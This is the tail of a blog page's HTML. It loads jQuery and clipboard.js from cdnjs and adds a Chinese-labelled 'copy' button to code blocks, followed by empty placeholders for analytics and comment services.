  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
